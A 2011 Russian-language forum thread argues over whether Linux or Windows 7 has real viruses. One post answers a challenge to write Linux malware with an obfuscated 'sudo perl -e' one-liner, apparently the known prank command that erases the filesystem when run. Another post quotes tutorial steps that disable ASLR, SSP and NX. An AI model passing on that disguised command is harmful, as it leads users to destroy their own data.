Форум StopLinux
- Темы: Активные | Без ответа
Объявление
#1 05-07-11 23:50:34
- ikkunan salvataja
- Участник
- Зарегистрирован: 30-01-10
- Сообщений: 2,688
Re: В продолжение про безопасность в линухе.
Я не пишу под линухом и для линуха
А жаль, видимо работоспособного вируса под линукс мы так и не дождёмся. Вон Дохтур тоже слился.
Yesterday it worked.
Today it is not working.
Windows is like that.
Неактивен
#2 06-07-11 00:40:16
- Babusha
- Нехристь
- Зарегистрирован: 12-03-10
- Сообщений: 2,160
Re: В продолжение про безопасность в линухе.
Я конечно с этой темой мало знаком, но разве нельзя методом переполнения буфера получить доступ к машине, где там уже распространять вирус?
Неактивен
#3 06-07-11 01:38:49
- Babusha
- Нехристь
- Зарегистрирован: 12-03-10
- Сообщений: 2,160
Re: В продолжение про безопасность в линухе.
Можно, собственно в статье (насколько я понял) эксплоит совмещен с руткитом, может принимать команды извне.
Ну как я понимаю, программа по идее не может "читать" память другого приложения, способом переполнения буфера программе удается "прочитать" память другого приложения, которое может выполняться от срута, т.е можно вставить произвольный код который будет работать от срута, я все правильно понимаю? Поправьте, есличо, а ынтэресно, же.
Неактивен
#4 06-07-11 03:50:58
- Белая рысь
- Мартовский кот
- Зарегистрирован: 13-08-10
- Сообщений: 763
Re: В продолжение про безопасность в линухе.
а сразу же начал вопить как в жопу раненая рысь
Нунифигасебеприколы. О.о Рысей не трогать, а орал он - как Завулон в лифте(с)
Зачем собственноручно писать, если они и так есть, причем не proof-of-concept, а массово распространяемые?
Пруф или поздравить соврамши? Я сижу под семёркой, где бы мне вирусочек поиметь? Или щас опять ссылки на кучи vkhacker'ов полетят, которые трояны бай дизайн?.. Вы, господа линуксоиды, тоже теоретизировать о стопицотнях вирусов под винду готовы до упаду.
А жаль, видимо работоспособного вируса под линукс мы так и не дождёмся.
Думаю, Вы понимаете, что методы, используемые для защиты от вирусов, сложно отнести к преимуществам ОС. Хотя какая вам там разница... Нет вирусов - и ладно. 
Редактировался Белая рысь (06-07-11 03:53:13)
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
#5 06-07-11 08:47:55
- Белая рысь
- Мартовский кот
- Зарегистрирован: 13-08-10
- Сообщений: 763
Re: В продолжение про безопасность в линухе.
TDL-4
Где я могу его он может меня поиметь? Или традиционные страшилки с теоретическими изысканиями?
Я надеюсь, вы понимаете, что вирмейкеры (да, если ЭТО можно вообще назвать вирмейкерами, конечно) еще более заинтересуются 7-й виндой, когда на ней большинство будет сидеть?
Значит, когда 1% линукса, побитый на десяток бинарно несовместимых дистров - это безопасность. А когда семёрка, уже побившая 15% рубеж (инфа из непроснувшегося мозга, может не соответствовать истине!!!) - это ещё мало народу. Линукслогика на марше.
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
#6 06-07-11 10:28:56
Re: В продолжение про безопасность в линухе.
которых... практически нет!
Вот не надо ляля. За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.
как написать вирус для линуха
Так напиши! Или на форуме строчить, не код писать?
Корпорация Lightman group: Герцог, оптимизация графа, формальная логика, ЦОД и многое другое.
Неактивен
#7 06-07-11 11:48:09
- Белая рысь
- Мартовский кот
- Зарегистрирован: 13-08-10
- Сообщений: 763
Re: В продолжение про безопасность в линухе.
За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.
Пруф, что это вирусы, или нутыпонел.пнг
Так напиши! Или на форуме строчить, не код писать?
sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Что? Ах, рута просит? А что Вы нам тогда свой зоопарк суёте? Он тоже повышения прав просил, дали же...
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
#8 06-07-11 11:58:14
- дохтур
- Боевой дятел
- Из Краматорск, ул. Железячкина
- Зарегистрирован: 30-11-09
- Сообщений: 994
Re: В продолжение про безопасность в линухе.
Вот не надо ляля. За эти полгода у меня перебывало около 150 ноутбуков с установленной семеркой, и в каждом из них приходилось вычищать зоопарк.
Жуть 
Или работа такая? 
Бывает, новые пользователи перезагружают компьютер, потому что не знают, как ещё можно выйти из vi
Ну ты пруфами не сыпь © Skynet2015
Провокатор хуев -) Я к тебе в твою конторку инсайдера зашлю, ты даже не узнаешь в какой момент тебя поимели -) © Rector, 2010-2015
Неактивен
#9 06-07-11 12:10:34
Re: В продолжение про безопасность в линухе.
Пруф, что это вирусы, или нутыпонел.пнг
Отключи на семерке ферволы и удали антивирусник.
Что? Ах, рута просит? А что Вы нам тогда свой зоопарк суёте? Он тоже повышения прав просил, дали же...
Поток сознания?
Жуть Или работа такая?
Дохтур, ты давай пиши-пиши. Как раз пруф хорошо так описывает, твои потуги с 700к рублями.
Редактировался Keeper (06-07-11 12:41:00)
Корпорация Lightman group: Герцог, оптимизация графа, формальная логика, ЦОД и многое другое.
Неактивен
#10 06-07-11 12:51:51
- Mazzy
- Посетитель зоопарка
- Зарегистрирован: 06-05-10
- Сообщений: 933
Re: В продолжение про безопасность в линухе.
pavel2403, Пашок, меня уже первые строки убили
Перед тем, как приступить к работе, необходимо отключить “Linux ASLR”. Это можно сделать путем передачи целого значения в /proc/sys/kernel/randomize_va_space
Для этого нам придется отключить некоторые механизмы безопасности.
Давайте посмотрим, что случится, если осуществить обычную компиляцию, загрузить код в отладчик и попытаться вызвать переполнение буфера.Дело в том, что gcc версий 3.x и 4.x выполняет компиляцию кода с использованием механизма SSP (Stack-smashing protection). SSP используется для обнаружения переполнения буфера до выполнения вредоносного кода.
Пашка, что там читать?
Добавлено спустя 01 мин 53 с:
Народ рассуждает о написании вирусов, мимолетом заявляя, что "конечно, нужно отключить все механизмы безопасности, дабы обеспечить работу вируса".
Добавлено спустя 06 мин 08 с:
Теперь необходимо отключить в Makefile функционал NX, для этого добавим флаг “-z execstack”:
Все, аминь! Отключили все, можно писать эксплоит.
Неактивен
#11 06-07-11 14:18:31
- Гареев Станислав
- Вижуалкибергоп
- Из Пятигорск
- Зарегистрирован: 24-07-10
- Сообщений: 3,103
- Сайт
Re: В продолжение про безопасность в линухе.
Народ рассуждает о написании вирусов, мимолетом заявляя, что "конечно, нужно отключить все механизмы безопасности, дабы обеспечить работу вируса".
Жалко что вирусы не работают нормально без прав рута, а как вирусу делегировать права?
Не ламерствуй лукаво.
"А петь мне нельзя - постановление суда" (с) Бендер
Неактивен
#12 06-07-11 21:27:44
- Белая рысь
- Мартовский кот
- Зарегистрирован: 13-08-10
- Сообщений: 763
Re: В продолжение про безопасность в линухе.
Белая рысь пишет:Пруф, что это вирусы, или нутыпонел.пнг
Отключи на семерке ферволы и удали антивирусник.
Та-а-ак... И что дальше? Зайти под админом и отключить уак, а потом под этим же админом валить на порносайты? Об этом вы можете поговорить с Mazzy, он очень хорошо про отключение систем безопасности написал. BTW, файрволл у меня и так отключен, а вместо антивируса - MSE, взятый из нашего аналога репозитория. Так куда мне идти за вирусом?
Белая рысь пишет:Или традиционные страшилки с теоретическими изысканиями?
Традиционные страшилки про теоретические 4,5 млн. компьютеров в теоретическом ботнете за первые 3 месяца 2011 года от известных сказочников на securelist.com
Белая рысь пишет:Значит, когда 1% линукса, побитый на десяток бинарно несовместимых дистров - это безопасность.
Нет, «бинарная несовместимость» – это 4.2, вероятно, происходящее от отсутствия достаточных знаний о данной ОС.
А про безопасность я тут ничего не говорил. Лишь про отсутствие вирусов для линукса на данный момент.Белая рысь пишет:А когда семёрка, уже побившая 15% рубеж (инфа из непроснувшегося мозга, может не соответствовать истине!!!) - это ещё мало народу.
Как ни странно, но рубеж били прежде всего организованными миграциями в корпоративной среде. Где как бы за безопасность отвечает не дикий виндеец у себя дома, а специально обученный персонал.
1. Где на написано, что это именно самораспространяющиеся малвари, а не очередные vkhacker'ы и "вирус Талибан"? А то где-то на секурлисте и про линух что-то проскакивало... Не смотря на его недостаточный даже по сравнению с семеркой процент распространения...
2. Про 4.2 - не знаю, надо потестить, но ставить кучу дистров мне лень. Поверю на слово.
3. А какая вирусу-то разница? О.о Или мы опять скатились к примитивным троянам вида "а дай-ка мне прав, а то я никак в папку виндузе ничего записать не могу"... Ну, толсто же. Тот же конфикер организациям тоже изрядно нервов потрепал.
Белая рысь пишет:Пруф, что это вирусы, или нутыпонел.пнг
Стоит напомнить, что вирус - это злонамеренное ПО, которое может размножаться. Преодоление защиты - это уже называется эксплойтом.
Кстати, еще недавно я умудрился заразить Windows 7 x64 вирусом (настоящим вирусом) еще 2003-2006 годов выпуска. Просто откопал старый диск с игрой и забыл, что там был тот самый вирус. Кстати это был вот этот вирус и особых последствий после него нет, а ведь мог бы выпасть и злобный Sality...
Во-первых. Можно и не эксплойтом, но так, чтобы я про это не знал. Во-вторых, Вы игрушку от админа и без антивиря ставили? ССЗБ.
ЗЫЖ С мобильника постить - геморрой.
Редактировался Белая рысь (06-07-11 21:30:47)
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
✅ Выделенные от 3000 ₽/месяц. RAM 4-64GB, DISK до 4TB;
✅ Intel Xeon, SSD, XEN, iLO/KVM, Windows/Linux, Администрирование;
✅ Бесплатно Full Backup и Anti-DDoS.